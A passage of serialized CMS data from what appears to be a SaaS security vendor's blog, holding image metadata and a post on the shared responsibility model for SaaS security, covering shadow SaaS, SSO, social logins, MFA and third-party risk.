ype":173,"value":273597,"marks":282882,"data":282884},[282883],{"type":1646},{},{"nodeType":178,"data":282886,"content":282887},{},[282888],{"nodeType":173,"value":273605,"marks":282889,"data":282890},[],{},{"nodeType":312,"data":282892,"content":282895},{"target":282893},{"sys":282894},{"id":209109,"type":317,"linkType":318},[],{"nodeType":178,"data":282897,"content":282898},{},[282899],{"nodeType":173,"value":37,"marks":282900,"data":282901},[],{},{"entries":282903},{"hyperlink":282904,"inline":282905,"block":282906},[],[],[282907,282909,282912,282918,282921,282924,282932,282939,282946],{"sys":282908,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":282910,"__typename":5345,"title":274674,"caption":274675,"layoutMode":118,"file":282911},{"id":273329},{"url":274677,"width":5358,"height":274678},{"sys":282913,"__typename":5345,"title":282914,"caption":282915,"layoutMode":118,"file":282916},{"id":273349},"New SaaS acct chatops","A ChatOps message from Push to administrators about a new app signup",{"url":282917,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/6lrpt8ch3nqSaU0kSMc0ig/cfc44aecacdb399e5a5ef739a724e77d/image7.png",{"sys":282919,"__typename":5345,"title":274687,"caption":274688,"layoutMode":118,"file":282920},{"id":273465},{"url":274690,"width":274691,"height":274692},{"sys":282922,"__typename":5345,"title":274695,"caption":274696,"layoutMode":118,"file":282923},{"id":273485},{"url":274698,"width":5358,"height":274678},{"sys":282925,"__typename":5345,"title":282926,"caption":282927,"layoutMode":118,"file":282928},{"id":273523},"SSO tax image","SSO is the gold standard, but it's unavailable or impractical for many apps",{"url":282929,"width":282930,"height":282931},"https://images.ctfassets.net/y1cdw1ablpvd/7DvBY7bwHWeF20RZvxQlHQ/9957f75e59dee10b28d13b38e4d88e9f/Screenshot_2023-10-06_at_10.17.51_AM.png",1752,988,{"sys":282933,"__typename":5345,"title":282934,"caption":282935,"layoutMode":118,"file":282936},{"id":273566},"Push MFA not registered","Identities dashboard in Push showing MFA-related security issues",{"url":282937,"width":173178,"height":282938},"https://images.ctfassets.net/y1cdw1ablpvd/LzyT5HwjDRbiCj2Eqvtmg/2371f3c9437a78551548babc02fe24bc/image4.png",1113,{"sys":282940,"__typename":5345,"title":282941,"caption":282942,"layoutMode":118,"file":282943},{"id":273587},"In-Browser password guidance","Push can guide employees in the browser, as they're signing up, to create strong credentials from the start",{"url":282944,"width":282945,"height":80172},"https://images.ctfassets.net/y1cdw1ablpvd/5ttm9ljSgqZfEY1J6ZjIP4/2b1f734bc12cafb7952b1d1e26ec6870/image5.png",1346,{"sys":282947,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:manage-third-party-data-access.json","blog/manage-third-party-data-access.json","blog/manage-third-party-data-access",{"_path":282952,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":282953,"ogImage":118,"summary":282956,"title":282967,"subtitle":118,"metaTitle":282968,"synopsis":282969,"hashTags":118,"publishedDate":282970,"slug":282971,"tagsCollection":282972,"relatedBlogPostsCollection":282978,"authorsCollection":284295,"content":284299,"_id":284979,"_type":5439,"_source":5440,"_file":284980,"_stem":284981,"_extension":5439},"/blog/report-on-identity-based-attacks",{"id":282954,"publishedAt":282955},"3mqMCM9bqSDqpMvxttYOFx","2026-01-30T09:32:29.362Z",{"json":282957},{"data":282958,"content":282959,"nodeType":165},{},[282960],{"data":282961,"content":282962,"nodeType":178},{},[282963],{"data":282964,"marks":282965,"value":282966,"nodeType":173},{},[],"Identities have quickly become the new perimeter, leading attackers to target identities as the primary way to access sensitive corporate data. A recent report found that 68% of companies say identity-related attacks directly impacted their business in 2023.","6 surprising takeaways from a recent report on identity-based attacks ","Surprising takeaways from an identity-based attacks report","A new report on securing digital identities has some interesting takeaways to consider as we think about securing identities in the cloud. Here's our take.","2023-10-03T00:00:00.000Z","report-on-identity-based-attacks",{"items":282973},[282974,282976],{"sys":282975,"name":26137},{"id":26136},{"sys":282977,"name":505},{"id":504},{"items":282979},[282980,283430],{"__typename":1528,"sys":282981,"content":282982,"title":274148,"synopsis":274149,"hashTags":118,"publishedDate":274150,"slug":274151,"tagsCollection":283420,"authorsCollection":283426},{"id":273639},{"json":282983},{"nodeType":165,"data":282984,"content":282985},{},[282986,282992,282998,283004,283010,283016,283036,283046,283064,283070,283076,283089,283095,283101,283107,283113,283119,283125,283130,283136,283204,283210,283215,283221,283227,283244,283250,283256,283277,283295,283301,283307,283337,283342,283348,283366,283372,283378,283396,283402,283408,283414],{"nodeType":169,"data":282987,"content":282988},{},[282989],{"nodeType":173,"value":258287,"marks":282990,"data":282991},[],{},{"nodeType":178,"data":282993,"content":282994},{},[282995],{"nodeType":173,"value":273654,"marks":282996,"data":282997},[],{},{"nodeType":178,"data":282999,"content":283000},{},[283001],{"nodeType":173,"value":273661,"marks":283002,"data":283003},[],{},{"nodeType":235,"data":283005,"content":283006},{},[283007],{"nodeType":173,"value":273668,"marks":283008,"data":283009},[],{},{"nodeType":178,"data":283011,"content":283012},{},[283013],{"nodeType":173,"value":273675,"marks":283014,"data":283015},[],{},{"nodeType":178,"data":283017,"content":283018},{},[283019,283022,283026,283029,283033],{"nodeType":173,"value":273682,"marks":283020,"data":283021},[],{},{"nodeType":173,"value":273686,"marks":283023,"data":283025},[283024],{"type":1646},{},{"nodeType":173,"value":273691,"marks":283027,"data":283028},[],{},{"nodeType":173,"value":273695,"marks":283030,"data":283032},[283031],{"type":1646},{},{"nodeType":173,"value":273700,"marks":283034,"data":283035},[],{},{"nodeType":178,"data":283037,"content":283038},{},[283039,283043],{"nodeType":173,"value":273707,"marks":283040,"data":283042},[283041],{"type":1646},{},{"nodeType":173,"value":273712,"marks":283044,"data":283045},[],{},{"nodeType":178,"data":283047,"content":283048},{},[283049,283052,283061],{"nodeType":173,"value":273719,"marks":283050,"data":283051},[],{},{"nodeType":1698,"data":283053,"content":283056},{"target":283054},{"sys":283055},{"id":273726,"type":317,"linkType":318},[283057],{"nodeType":173,"value":273729,"marks":283058,"data":283060},[283059],{"type":194},{},{"nodeType":173,"value":273734,"marks":283062,"data":283063},[],{},{"nodeType":178,"data":283065,"content":283066},{},[283067],{"nodeType":173,"value":273741,"marks":283068,"data":283069},[],{},{"nodeType":169,"data":283071,"content":283072},{},[283073],{"nodeType":173,"value":273748,"marks":283074,"data":283075},[],{},{"nodeType":178,"data":283077,"content":283078},{},[283079,283082,283086],{"nodeType":173,"value":273755,"marks":283080,"data":283081},[],{},{"nodeType":173,"value":3107,"marks":283083,"data":283085},[283084],{"type":370},{},{"nodeType":173,"value":273763,"marks":283087,"data":283088},[],{},{"nodeType":178,"data":283090,"content":283091},{},[283092],{"nodeType":173,"value":273770,"marks":283093,"data":283094},[],{},{"nodeType":235,"data":283096,"content":283097},{},[283098],{"nodeType":173,"value":273777,"marks":283099,"data":283100},[],{},{"nodeType":178,"data":283102,"content":283103},{},[283104],{"nodeType":173,"value":273784,"marks":283105,"data":283106},[],{},{"nodeType":178,"data":283108,"content":283109},{},[283110],{"nodeType":173,"value":273791,"marks":283111,"data":283112},[],{},{"nodeType":169,"data":283114,"content":283115},{},[283116],{"nodeType":173,"value":273798,"marks":283117,"data":283118},[],{},{"nodeType":178,"data":283120,"content":283121},{},[283122],{"nodeType":173,"value":273805,"marks":283123,"data":283124},[],{},{"nodeType":312,"data":283126,"content":283129},{"target":283127},{"sys":283128},{"id":273812,"type":317,"linkType":318},[],{"nodeType":178,"data":283131,"content":283132},{},[283133],{"nodeType":173,"value":273818,"marks":283134,"data":283135},[],{},{"nodeType":250,"data":283137,"content":283138},{},[283139,283152,283165,283178,283191],{"nodeType":254,"data":283140,"content":283141},{},[283142],{"nodeType":178,"data":283143,"content":283144},{},[283145,283149],{"nodeType":173,"value":273831,"marks":283146,"data":283148},[283147],{"type":370},{},{"nodeType":173,"value":273836,"marks":283150,"data":283151},[],{},{"nodeType":254,"data":283153,"content":283154},{},[283155],{"nodeType":178,"data":283156,"content":283157},{},[283158,283162],{"nodeType":173,"value":273846,"marks":283159,"data":283161},[283160],{"type":370},{},{"nodeType":173,"value":273851,"marks":283163,"data":283164},[],{},{"nodeType":254,"data":283166,"content":283167},{},[283168],{"nodeType":178,"data":283169,"content":283170},{},[283171,283175],{"nodeType":173,"value":273861,"marks":283172,"data":283174},[283173],{"type":370},{},{"nodeType":173,"value":273866,"marks":283176,"data":283177},[],{},{"nodeType":254,"data":283179,"content":283180},{},[283181],{"nodeType":178,"data":283182,"content":283183},{},[283184,283188],{"nodeType":173,"value":273876,"marks":283185,"data":283187},[283186],{"type":370},{},{"nodeType":173,"value":273881,"marks":283189,"data":283190},[],{},{"nodeType":254,"data":283192,"content":283193},{},[283194],{"nodeType":178,"data":283195,"content":283196},{},[283197,283201],{"nodeType":173,"value":273891,"marks":283198,"data":283200},[283199],{"type":370},{},{"nodeType":173,"value":273896,"marks":283202,"data":283203},[],{},{"nodeType":169,"data":283205,"content":283206},{},[283207],{"nodeType":173,"value":273903,"marks":283208,"data":283209},[],{},{"nodeType":312,"data":283211,"content":283214},{"target":283212},{"sys":283213},{"id":273910,"type":317,"linkType":318},[],{"nodeType":235,"data":283216,"content":283217},{},[283218],{"nodeType":173,"value":273916,"marks":283219,"data":283220},[],{},{"nodeType":178,"data":283222,"content":283223},{},[283224],{"nodeType":173,"value":273923,"marks":283225,"data":283226},[],{},{"nodeType":178,"data":283228,"content":283229},{},[283230,283233,283241],{"nodeType":173,"value":273930,"marks":283231,"data":283232},[],{},{"nodeType":1698,"data":283234,"content":283237},{"target":283235},{"sys":283236},{"id":273937,"type":317,"linkType":318},[283238],{"nodeType":173,"value":273940,"marks":283239,"data":283240},[],{},{"nodeType":173,"value":273944,"marks":283242,"data":283243},[],{},{"nodeType":235,"data":283245,"content":283246},{},[283247],{"nodeType":173,"value":273951,"marks":283248,"data":283249},[],{},{"nodeType":178,"data":283251,"content":283252},{},[283253],{"nodeType":173,"value":273958,"marks":283254,"data":283255},[],{},{"nodeType":250,"data":283257,"content":283258},{},[283259,283268],{"nodeType":254,"data":283260,"content":283261},{},[283262],{"nodeType":178,"data":283263,"content":283264},{},[283265],{"nodeType":173,"value":273971,"marks":283266,"data":283267},[],{},{"nodeType":254,"data":283269,"content":283270},{},[283271],{"nodeType":178,"data":283272,"content":283273},{},[283274],{"nodeType":173,"value":273981,"marks":283275,"data":283276},[],{},{"nodeType":178,"data":283278,"content":283279},{},[283280,283283,283292],{"nodeType":173,"value":273988,"marks":283281,"data":283282},[],{},{"nodeType":1698,"data":283284,"content":283287},{"target":283285},{"sys":283286},{"id":273995,"type":317,"linkType":318},[283288],{"nodeType":173,"value":28052,"marks":283289,"data":283291},[283290],{"type":194},{},{"nodeType":173,"value":274002,"marks":283293,"data":283294},[],{},{"nodeType":235,"data":283296,"content":283297},{},[283298],{"nodeType":173,"value":274009,"marks":283299,"data":283300},[],{},{"nodeType":178,"data":283302,"content":283303},{},[283304],{"nodeType":173,"value":274016,"marks":283305,"data":283306},[],{},{"nodeType":250,"data":283308,"content":283309},{},[283310,283319,283328],{"nodeType":254,"data":283311,"content":283312},{},[283313],{"nodeType":178,"data":283314,"content":283315},{},[283316],{"nodeType":173,"value":274029,"marks":283317,"data":283318},[],{},{"nodeType":254,"data":283320,"content":283321},{},[283322],{"nodeType":178,"data":283323,"content":283324},{},[283325],{"nodeType":173,"value":274039,"marks":283326,"data":283327},[],{},{"nodeType":254,"data":283329,"content":283330},{},[283331],{"nodeType":178,"data":283332,"content":283333},{},[283334],{"nodeType":173,"value":274049,"marks":283335,"data":283336},[],{},{"nodeType":312,"data":283338,"content":283341},{"target":283339},{"sys":283340},{"id":274056,"type":317,"linkType":318},[],{"nodeType":235,"data":283343,"content":283344},{},[283345],{"nodeType":173,"value":274062,"marks":283346,"data":283347},[],{},{"nodeType":178,"data":283349,"content":283350},{},[283351,283354,283363],{"nodeType":173,"value":274069,"marks":283352,"data":283353},[],{},{"nodeType":1698,"data":283355,"content":283358},{"target":283356},{"sys":283357},{"id":273937,"type":317,"linkType":318},[283359],{"nodeType":173,"value":274078,"marks":283360,"data":283362},[283361],{"type":194},{},{"nodeType":173,"value":60235,"marks":283364,"data":283365},[],{},{"nodeType":178,"data":283367,"content":283368},{},[283369],{"nodeType":173,"value":274089,"marks":283370,"data":283371},[],{},{"nodeType":235,"data":283373,"content":283374},{},[283375],{"nodeType":173,"value":274096,"marks":283376,"data":283377},[],{},{"nodeType":178,"data":283379,"content":283380},{},[283381,283384,283393],{"nodeType":173,"value":274103,"marks":283382,"data":283383},[],{},{"nodeType":1698,"data":283385,"content":283388},{"target":283386},{"sys":283387},{"id":274110,"type":317,"linkType":318},[283389],{"nodeType":173,"value":274113,"marks":283390,"data":283392},[283391],{"type":194},{},{"nodeType":173,"value":274118,"marks":283394,"data":283395},[],{},{"nodeType":169,"data":283397,"content":283398},{},[283399],{"nodeType":173,"value":40632,"marks":283400,"data":283401},[],{},{"nodeType":178,"data":283403,"content":283404},{},[283405],{"nodeType":173,"value":274131,"marks":283406,"data":283407},[],{},{"nodeType":178,"data":283409,"content":283410},{},[283411],{"nodeType":173,"value":274138,"marks":283412,"data":283413},[],{},{"nodeType":178,"data":283415,"content":283416},{},[283417],{"nodeType":173,"value":274145,"marks":283418,"data":283419},[],{},{"items":283421},[283422,283424],{"sys":283423,"name":274157},{"id":274156},{"sys":283425,"name":26133},{"id":26132},{"items":283427},[283428],{"fullName":274163,"firstName":274164,"jobTitle":274165,"profilePicture":283429},{"url":274167},{"__typename":1528,"sys":283431,"content":283432,"title":284281,"synopsis":284282,"hashTags":118,"publishedDate":284283,"slug":284284,"tagsCollection":284285,"authorsCollection":284291},{"id":273726},{"json":283433},{"nodeType":165,"data":283434,"content":283435},{},[283436,283443,283450,283455,283489,283496,283503,283522,283529,283536,283543,283562,283567,283574,283587,283594,283601,283608,283614,283637,283644,283651,283658,283665,283672,283679,283697,283705,283721,283728,283734,283755,283782,283798,283824,283831,283838,283845,283852,283859,283866,283873,283924,283931,283961,283998,284073,284080,284087,284094,284101,284108,284115,284122,284129,284135,284142,284149,284169,284176,284183,284190,284196,284203,284210,284217,284224,284247,284254,284260],{"nodeType":178,"data":283437,"content":283438},{},[283439],{"nodeType":173,"value":283440,"marks":283441,"data":283442},"If you’re working in security, you know you’re on the hook to secure all the assets in your organization’s attack surface – including cloud and SaaS applications. But with employees signing up and adopting SaaS applications without your oversight, the scale of your attack surface has blown up without you even knowing it - leading to a huge increase in SaaS security risks. ",[],{},{"nodeType":178,"data":283444,"content":283445},{},[283446],{"nodeType":173,"value":283447,"marks":283448,"data":283449},"You’ve probably locked down the known cloud services and cloud apps your company is using (Google Workspace, Microsoft 365, etc.) and you have policies you’re already enforcing for how employees log into, access, and input sensitive data into cloud platforms like Salesforce and Hubspot. \n\nBut what about all those other SaaS applications people in the company are using? Those apps make up a significant part of your attack surface. ",[],{},{"nodeType":312,"data":283451,"content":283454},{"target":283452},{"sys":283453},{"id":280733,"type":317,"linkType":318},[],{"nodeType":178,"data":283456,"content":283457},{},[283458,283462,283472,283476,283485],{"nodeType":173,"value":283459,"marks":283460,"data":283461},"You need visibility into all those apps as the first step. We ",[],{},{"nodeType":1698,"data":283463,"content":283467},{"target":283464},{"sys":283465},{"id":283466,"type":317,"linkType":318},"3PqX7fLrTIYhWjbEhHSRHG",[283468],{"nodeType":173,"value":283469,"marks":283470,"data":283471},"can help there",[],{},{"nodeType":173,"value":283473,"marks":283474,"data":283475}," and there are some ",[],{},{"nodeType":1698,"data":283477,"content":283480},{"target":283478},{"sys":283479},{"id":282056,"type":317,"linkType":318},[283481],{"nodeType":173,"value":283482,"marks":283483,"data":283484},"semi-hacky ways",[],{},{"nodeType":173,"value":283486,"marks":283487,"data":283488}," you can even get this visibility on your own. ",[],{},{"nodeType":169,"data":283490,"content":283491},{},[283492],{"nodeType":173,"value":283493,"marks":283494,"data":283495},"I found all these shadow SaaS apps, now what?",[],{},{"nodeType":178,"data":283497,"content":283498},{},[283499],{"nodeType":173,"value":283500,"marks":283501,"data":283502},"Once you get the list of (likely hundreds) of SaaS applications employees have been using that you weren’t aware of, you’re probably then thinking about the next daunting task - how do I secure all these shadow SaaS or shadow IT assets across your SaaS attack surface to manage SaaS security risks?",[],{},{"nodeType":178,"data":283504,"content":283505},{},[283506,283510,283518],{"nodeType":173,"value":283507,"marks":283508,"data":283509},"That’s where the ",[],{},{"nodeType":186,"data":283511,"content":283512},{"uri":280989},[283513],{"nodeType":173,"value":283514,"marks":283515,"data":283517},"shared responsibility model ",[283516],{"type":194},{},{"nodeType":173,"value":283519,"marks":283520,"data":283521},"comes into play. You’re not on the hook to take on every aspect of SaaS security, so let’s do a walkthrough of this model and we’ll help you hone in on where you can make the most impact when it comes to securing your sensitive data with every third-party SaaS vendor.",[],{},{"nodeType":235,"data":283523,"content":283524},{},[283525],{"nodeType":173,"value":283526,"marks":283527,"data":283528},"SaaS allows you to offload some operational security",[],{},{"nodeType":178,"data":283530,"content":283531},{},[283532],{"nodeType":173,"value":283533,"marks":283534,"data":283535},"You’re undoubtedly resource strapped, so using SaaS apps is a great way to delegate as many operational security tasks as possible to the cloud provider.",[],{},{"nodeType":178,"data":283537,"content":283538},{},[283539],{"nodeType":173,"value":283540,"marks":283541,"data":283542},"The shared-responsibility model shows you your responsibilities as the customer and which the cloud provider owns - this is one of the reasons SaaS is taking over the world.   ",[],{},{"nodeType":178,"data":283544,"content":283545},{},[283546,283550,283558],{"nodeType":173,"value":283547,"marks":283548,"data":283549},"The following table produced by the ",[],{},{"nodeType":186,"data":283551,"content":283552},{"uri":280989},[283553],{"nodeType":173,"value":283554,"marks":283555,"data":283557},"National Cyber Security Centre",[283556],{"type":194},{},{"nodeType":173,"value":283559,"marks":283560,"data":283561}," (NCSC) shows how much of the balance of security responsibility is outsourced to the SaaS provider. For reference, IaaS = infrastructure-as-a-service; PaaS = platform-as-a-service; SaaS = software-as-a-service:",[],{},{"nodeType":312,"data":283563,"content":283566},{"target":283564},{"sys":283565},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":283568,"content":283569},{},[283570],{"nodeType":173,"value":283571,"marks":283572,"data":283573},"This table shows that in the SaaS model, you’re delegating a lot of responsibility for security to the vendor, which is great because it reduces the burden on your security team and SaaS providers are certainly best placed to secure their software. ",[],{},{"nodeType":178,"data":283575,"content":283576},{},[283577,283583],{"nodeType":173,"value":283578,"marks":283579,"data":283582},"However, this requires far greater trust in SaaS providers. ",[283580,283581],{"type":1646},{"type":370},{},{"nodeType":173,"value":283584,"marks":283585,"data":283586},"Even so, this is a net positive trade off for most organizations.",[],{},{"nodeType":178,"data":283588,"content":283589},{},[283590],{"nodeType":173,"value":283591,"marks":283592,"data":283593},"While we’re offloading a lot to SaaS providers, we aren’t offloading everything. You still need to take care of your responsibilities, even though they’re now quite limited.",[],{},{"nodeType":169,"data":283595,"content":283596},{},[283597],{"nodeType":173,"value":283598,"marks":283599,"data":283600},"How to handle your responsibilities for managing SaaS risks in your company ",[],{},{"nodeType":178,"data":283602,"content":283603},{},[283604],{"nodeType":173,"value":283605,"marks":283606,"data":283607},"So, how do you go about handling these two responsibilities highlighted in the table below?",[],{},{"nodeType":312,"data":283609,"content":283613},{"target":283610},{"sys":283611},{"id":283612,"type":317,"linkType":318},"4jeDpoYQzPmg5TFApeopSA",[],{"nodeType":246189,"data":283615,"content":283616},{},[283617,283627],{"nodeType":254,"data":283618,"content":283619},{},[283620],{"nodeType":178,"data":283621,"content":283622},{},[283623],{"nodeType":173,"value":283624,"marks":283625,"data":283626},"Configuration of the SaaS app ",[],{},{"nodeType":254,"data":283628,"content":283629},{},[283630],{"nodeType":178,"data":283631,"content":283632},{},[283633],{"nodeType":173,"value":283634,"marks":283635,"data":283636},"Manage identity and access controls provided by the app.",[],{},{"nodeType":235,"data":283638,"content":283639},{},[283640],{"nodeType":173,"value":283641,"marks":283642,"data":283643},"Configuration of the SaaS app",[],{},{"nodeType":178,"data":283645,"content":283646},{},[283647],{"nodeType":173,"value":283648,"marks":283649,"data":283650},"The way application configuration is presented in the NCSC table above is a bit of a red herring for the apps your employees will be self-adopting. The vast majority of SaaS apps (and especially self-adopted apps) allow very little, if any, security relevant configuration. ",[],{},{"nodeType":178,"data":283652,"content":283653},{},[283654],{"nodeType":173,"value":283655,"marks":283656,"data":283657},"Sure, the big core apps like Salesforce, Google Workspace, Microsoft 365 do (and often require a dedicated team or partner to run them), but they are highly unlikely to be self-adopted by employees. ",[],{},{"nodeType":178,"data":283659,"content":283660},{},[283661],{"nodeType":173,"value":283662,"marks":283663,"data":283664},"The issues that are likely to lead to a compromise are more likely to be related to the individual accounts on the app, rather than the app configuration - so in practice there may be little to do in terms of hardening most self-managed apps.",[],{},{"nodeType":235,"data":283666,"content":283667},{},[283668],{"nodeType":173,"value":283669,"marks":283670,"data":283671},"Manage identity and access controls, like MFA, provided by the app\n",[],{},{"nodeType":178,"data":283673,"content":283674},{},[283675],{"nodeType":173,"value":283676,"marks":283677,"data":283678},"You have a few options for handling this one. We’ll go through the key areas below:",[],{},{"nodeType":246189,"data":283680,"content":283681},{},[283682],{"nodeType":254,"data":283683,"content":283684},{},[283685],{"nodeType":178,"data":283686,"content":283687},{},[283688,283693],{"nodeType":173,"value":283689,"marks":283690,"data":283692},"SSO",[283691],{"type":370},{},{"nodeType":173,"value":283694,"marks":283695,"data":283696},": Better yet, if there’s a way to tuck the app behind SSO, do it! SAML SSO is the ideal, gold standard solution for managing your SaaS security risks. The big issue is that very, very few apps, particularly the smaller ones most of the employees in your company will be signing up for, offer SSO integrations. ",[],{},{"nodeType":178,"data":283698,"content":283699},{},[283700],{"nodeType":173,"value":283701,"marks":283702,"data":283704},"When we looked at the apps we cover, only 30% of them offered SAML SSO integrations. ",[283703],{"type":370},{},{"nodeType":178,"data":283706,"content":283707},{},[283708,283712,283717],{"nodeType":173,"value":283709,"marks":283710,"data":283711},"Making things worse, of those few apps that ",[],{},{"nodeType":173,"value":283713,"marks":283714,"data":283716},"did ",[283715],{"type":1646},{},{"nodeType":173,"value":283718,"marks":283719,"data":283720},"offer SAML SSO as a feature, they offered it as a paid feature that you can only access at a high pricing tier, typically Enterprise or the highest pricing tier. Many more apps offer social logins (aka OIDC SSO), and while this is not quite as good as SAML, for most organizations this is a far better option compared to local passwords for each SaaS app!",[],{},{"nodeType":178,"data":283722,"content":283723},{},[283724],{"nodeType":173,"value":283725,"marks":283726,"data":283727},"You’ve probably heard mutterings about this before and it’s even got its own site, called SSO tax, which gives you a sense of the huge number of apps without SSO integrations. See a screenshot of the site below:",[],{},{"nodeType":312,"data":283729,"content":283733},{"target":283730},{"sys":283731},{"id":283732,"type":317,"linkType":318},"71LeJlkZLWAr2rMN7Izam3",[],{"nodeType":178,"data":283735,"content":283736},{},[283737,283741,283751],{"nodeType":173,"value":283738,"marks":283739,"data":283740},"At the moment, this means SAML SSO isn’t a practical option for most apps. We wrote much more on this ",[],{},{"nodeType":1698,"data":283742,"content":283746},{"target":283743},{"sys":283744},{"id":283745,"type":317,"linkType":318},"tkUfN6TKuYyVNYDpsGWrE",[283747],{"nodeType":173,"value":28052,"marks":283748,"data":283750},[283749],{"type":194},{},{"nodeType":173,"value":283752,"marks":283753,"data":283754}," as well.",[],{},{"nodeType":178,"data":283756,"content":283757},{},[283758,283761,283766,283770,283779],{"nodeType":173,"value":144009,"marks":283759,"data":283760},[],{},{"nodeType":173,"value":283762,"marks":283763,"data":283765}," Encourage the other type of SSO — social logins",[283764],{"type":370},{},{"nodeType":173,"value":283767,"marks":283768,"data":283769},": It's also smart to make your policy towards OIDC SSO a.k.a. Social Logins (“login with Google” or “login with Microsoft”) clear. Our advice is you should prefer social logins over usernames and passwords wherever possible. Read more about that ",[],{},{"nodeType":1698,"data":283771,"content":283774},{"target":283772},{"sys":283773},{"id":273995,"type":317,"linkType":318},[283775],{"nodeType":173,"value":28052,"marks":283776,"data":283778},[283777],{"type":194},{},{"nodeType":173,"value":1477,"marks":283780,"data":283781},[],{},{"nodeType":178,"data":283783,"content":283784},{},[283785,283789,283794],{"nodeType":173,"value":283786,"marks":283787,"data":283788},"3.",[],{},{"nodeType":173,"value":283790,"marks":283791,"data":283793}," Employee trainings and education: ",[283792],{"type":370},{},{"nodeType":173,"value":283795,"marks":283796,"data":283797},"Of course, you’ll want to (and typically, you’ll be required to) do regular security training for your employees.",[],{},{"nodeType":178,"data":283799,"content":283800},{},[283801,283805,283816,283820],{"nodeType":173,"value":283802,"marks":283803,"data":283804},"If nothing else, make sure employees understand ",[],{},{"nodeType":1698,"data":283806,"content":283810},{"target":283807},{"sys":283808},{"id":283809,"type":317,"linkType":318},"5Zy1Kj162pY69NT6001gAa",[283811],{"nodeType":173,"value":283812,"marks":283813,"data":283815},"the value and impact of MFA",[283814],{"type":194},{},{"nodeType":173,"value":3107,"marks":283817,"data":283819},[283818],{"type":370},{},{"nodeType":173,"value":283821,"marks":283822,"data":283823},"and other identity access management tools.",[],{},{"nodeType":169,"data":283825,"content":283826},{},[283827],{"nodeType":173,"value":283828,"marks":283829,"data":283830},"Doesn’t delegating my responsibility increase SaaS security risks?",[],{},{"nodeType":178,"data":283832,"content":283833},{},[283834],{"nodeType":173,"value":283835,"marks":283836,"data":283837},"While delegating security responsibilities is great and takes a huge load off your security team, you need to consider who you’re delegating it to. ",[],{},{"nodeType":178,"data":283839,"content":283840},{},[283841],{"nodeType":173,"value":283842,"marks":283843,"data":283844},"This is what’s sometimes understood as supply chain security or third party risk management. You need to trust the SaaS provider to uphold their end of the bargain and, more often than not, also the SaaS/cloud vendors they use (their sub-processors) as well.",[],{},{"nodeType":178,"data":283846,"content":283847},{},[283848],{"nodeType":173,"value":283849,"marks":283850,"data":283851},"This sounds a lot scarier than it is. Many SaaS providers do a great job - they provide easy-to-audit, externally-verified, policies through a framework such as SOC2, and most do regular penetration tests and have bug bounty programs, etc.",[],{},{"nodeType":178,"data":283853,"content":283854},{},[283855],{"nodeType":173,"value":283856,"marks":283857,"data":283858},"And, before you panic about having to do a full security audit of every one of those hundreds of SaaS providers, know that there are tools that can help with this, which we’ll talk more about at the end of this article.",[],{},{"nodeType":169,"data":283860,"content":283861},{},[283862],{"nodeType":173,"value":283863,"marks":283864,"data":283865},"How to determine if you can live with the risk  ",[],{},{"nodeType":178,"data":283867,"content":283868},{},[283869],{"nodeType":173,"value":283870,"marks":283871,"data":283872},"Here are a few things you might consider when you assess third-party risk: ",[],{},{"nodeType":250,"data":283874,"content":283875},{},[283876,283900],{"nodeType":254,"data":283877,"content":283878},{},[283879,283887],{"nodeType":178,"data":283880,"content":283881},{},[283882],{"nodeType":173,"value":283883,"marks":283884,"data":283886},"The data going into these apps is simply too sensitive. ",[283885],{"type":370},{},{"nodeType":250,"data":283888,"content":283889},{},[283890],{"nodeType":254,"data":283891,"content":283892},{},[283893],{"nodeType":178,"data":283894,"content":283895},{},[283896],{"nodeType":173,"value":283897,"marks":283898,"data":283899},"Many organizations have very sensitive data, customer information or intellectual property (IP) that they simply aren’t willing to entrust to a third party. ",[],{},{"nodeType":254,"data":283901,"content":283902},{},[283903,283911],{"nodeType":178,"data":283904,"content":283905},{},[283906],{"nodeType":173,"value":283907,"marks":283908,"data":283910},"The app requests administrative access to sensitive systems ",[283909],{"type":370},{},{"nodeType":250,"data":283912,"content":283913},{},[283914],{"nodeType":254,"data":283915,"content":283916},{},[283917],{"nodeType":178,"data":283918,"content":283919},{},[283920],{"nodeType":173,"value":283921,"marks":283922,"data":283923},"You may not want to trust a third party with administrative access to critical IT systems",[],{},{"nodeType":178,"data":283925,"content":283926},{},[283927],{"nodeType":173,"value":283928,"marks":283929,"data":283930},"If the sensitive data in the app or the access the app has represents some significant (but not unacceptable) risk, you may consider:",[],{},{"nodeType":250,"data":283932,"content":283933},{},[283934],{"nodeType":254,"data":283935,"content":283936},{},[283937,283948],{"nodeType":178,"data":283938,"content":283939},{},[283940,283945],{"nodeType":173,"value":283941,"marks":283942,"data":283944},"The vendor has a string of repeated breaches or security incidents",[283943],{"type":370},{},{"nodeType":173,"value":197,"marks":283946,"data":283947},[],{},{"nodeType":250,"data":283949,"content":283950},{},[283951],{"nodeType":254,"data":283952,"content":283953},{},[283954],{"nodeType":178,"data":283955,"content":283956},{},[283957],{"nodeType":173,"value":283958,"marks":283959,"data":283960},"This is troubling because it’s a fairly common pattern for attackers to breach apps in ways that don’t impact customer information, but then use the information they learn from these breaches to launch far more successful breaches in future and gain access to additional sensitive data. ",[],{},{"nodeType":178,"data":283962,"content":283963},{},[283964,283968,283975,283978,283985,283988,283995],{"nodeType":173,"value":283965,"marks":283966,"data":283967},"Consider the string of breaches at ",[],{},{"nodeType":186,"data":283969,"content":283970},{"uri":281153},[283971],{"nodeType":173,"value":281156,"marks":283972,"data":283974},[283973],{"type":194},{},{"nodeType":173,"value":2936,"marks":283976,"data":283977},[],{},{"nodeType":186,"data":283979,"content":283980},{"uri":281165},[283981],{"nodeType":173,"value":211167,"marks":283982,"data":283984},[283983],{"type":194},{},{"nodeType":173,"value":2936,"marks":283986,"data":283987},[],{},{"nodeType":186,"data":283989,"content":283990},{"uri":281176},[283991],{"nodeType":173,"value":281179,"marks":283992,"data":283994},[283993],{"type":194},{},{"nodeType":173,"value":281184,"marks":283996,"data":283997},[],{},{"nodeType":250,"data":283999,"content":284000},{},[284001,284025,284049],{"nodeType":254,"data":284002,"content":284003},{},[284004,284012],{"nodeType":178,"data":284005,"content":284006},{},[284007],{"nodeType":173,"value":284008,"marks":284009,"data":284011},"The app doesn’t offer adequate security features. 